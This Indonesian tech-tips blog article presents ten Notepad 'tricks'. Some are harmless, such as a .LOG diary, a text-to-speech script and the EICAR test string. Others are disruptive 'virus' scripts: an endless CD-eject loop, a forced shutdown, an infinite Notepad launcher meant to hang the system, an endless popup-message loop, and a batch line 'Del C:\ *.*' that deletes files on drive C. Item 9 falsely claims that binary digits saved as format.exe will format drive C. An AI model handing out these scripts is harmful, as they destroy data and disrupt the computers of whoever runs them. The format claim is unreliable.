Beranda Tips

10 Trik Rahasia Sekaligus Berbahaya yang Bisa Dilakukan di Notepad

187
0

Kalau Gadgeteers adalah pengguna komputer berbasis Windows, kemungkinan besar Gadgeteers sudah mengenal sebuah aplikasi pengetikan yang sangat sederhana bernama Notepad. Selain sekedar untuk mencatat, ternyata aplikasi yang ringan dan simpel ini juga bisa digunakan sebagai sarana coding untuk melakukan perintah tertentu, baik perintah yang berguna maupun perintah yang bisa mengacaukan sistem di komputer.

Berikut ini adalah 10 trik coding yang bisa Gadgeteers lakukan dengan menggunakan Notepad.

Jika Gadgeteers belum tahu cara membuka Notepad, cukup ketika kata “Notepad” (tanpa tanda kutip) di kolom pencarian Windows atau tekan tombol Win + R pada keyboard dan masukkan kata “Notepad.exe” (tanpa tanda kutip) dan tekan enter.

1. Membuat “Virus” CD Drive

Gadgeteers bisa membuat sebuah perintah untuk membuat CD drive di komputer tersebut terus-menerus melakukan eject tanpa ditekan secara manual. Caranya gampang. Gadgeteers cukup menuliskan kode berikut di Notepad:

Set oWMP = CreateObject(“WMPlayer.OCX.7″)Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop

Notepad

Lalu simpan file tersebut dengan nama cdvirus.vbs. klik dua kali pada file tersebut, maka “virus” tersebut akan langsung berjalan. Untuk menghentikan “virus” di atas, buka Task Manager, pada tab Processes, hentikan program yang sedang berjalan dengan nama “wscript.exe”.

2. Mematikan komputer dengan pesan tambahan

Gadgeteers bisa membuat sebuah kode yang dapat mematikan komputer dengan tambahan pesan di dalamnya. Cukup masukkan kode berikut:

@echo offShutdown.exe -s -t 10clsmsg * Shutdown dulu ya komputernya!

Notepad

Save file tersebut dengan nama shutdownvirus.bat, dan kode tersebut akan langsung aktif bila diklik dua kali.

3. Unlimited Notepad

Dengan trik ini Gadgeteers bisa membuat aplikasi Notepad akan dibuka secara tidak terhingga dan membuat sebuah sistem komputer menjadi hang. Gadgeteers cukup menuliskan kode berikut di Notepad:

@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top

Notepad

Save dengan nama unlimitednotepad.bat, dan klik file tersebut dua kali untuk menjalankan “virus” yang sudah Gadgeteers buat.

Topik Hot Lainnya:   Cara Mudah Menyembunyikan File di Android Tanpa Aplikasi

4. Membuat diary

Trik ini akan secara otomatis membuat Notepad mencatat jam dan tanggal setiap kali Gadgeteers membuka program ini. cukup tuliskan kode .log dan save file tersebut dengan nama personaldiary.txt.

Notepad

5. Mengetes sistem antivirus

Kode ini berguna untuk menguji keampuhan sistem antivirus yang ada di komputer Gadgeteers. Cukup ketik:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Notepad

Lalu save file tersebut dengan nama virus.exe. klik dua kali untuk melakukan pengujian.

6. Membuat efek film Matrix

Pertama-tama buka aplikasi Notepad, lalu masukkan kode berikut:

@echo offcolor 02:startecho %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%goto start

Notepad

Save dengan nama matrix.bat, klik dua kali pada file tersebut, dan nikmati efek dari film Matrix.

7. Membuat pesan spam

Kode ini berfungsi untuk membuat pesan teks tanpa henti dan bisa dikategorikan sebagi virus. Gadgeteers cukup menulis:

@ECHO off:Beginmsg * Himsg * Are you having fun?msg * I am!msg * Lets have fun together!msg * Because you have been o-w-n-e-dGOTO BEGIN

Notepad

Save file tersebut dengan nama continue.bat. Klik dua kali untuk mengaktifkan sebuah virus spam pesan yang akan selalu berjalan.

8. Mengubah teks menjadi suara

Dengan melakukan trik ini, Gadgeteers akan mendengar suara dari komputer Gadgeteers. Cukup masukkan kode:

Dim message, sapi message=InputBox(“Enter your text for conversion–Hacking-prophethacker”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message

Notepad

Save dengan nama textaudio.vbs. klik dua kali untuk mengaktifkan file tersebut dan dengarkanlah suara asli dari komputer Gadgeteers.

9. Format Drive C

Ini adalah trik yang sangat berbahaya karena mampu menghapus seluruh isi drive C di harddisk Gadgeteers. Jadi jangan digunakan jika Gadgeteers tidak berniat menghapusnya. Caranya cukup gampang karena Gadgeteers cukup menulis kode berikut di Notepad:

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

Notepad

Save dengan nama format.exe, klik dua kali, dan Gadgeteers akan melakukan format pada drive C.

Topik Hot Lainnya:   Aplikasi Pembuat Video Slow Motion Terbaik di Android 2019

10. Virus sederhana tapi mematikan

Mirip dengan trik ke 9 yang bisa menghapus seluruh isi drive C, namun trik yang ini terasa lebih berbahaya karena tidak ada pemberitahuan apapun sebelum proses penghapusan. Gadgeteers cukup memasukkan kode berikut:

@Echo offDel C:\ *.* |y

Notepad

Save dengan nama bomb.bat. Klik dua kali pada file tersebut dan ucapkan selamat tinggal untuk data-data di Drive C Gadgeteers.

via jalantikus.com
WN

LEAVE A REPLY

Please enter your comment!
Please enter your name here

19 − fourteen =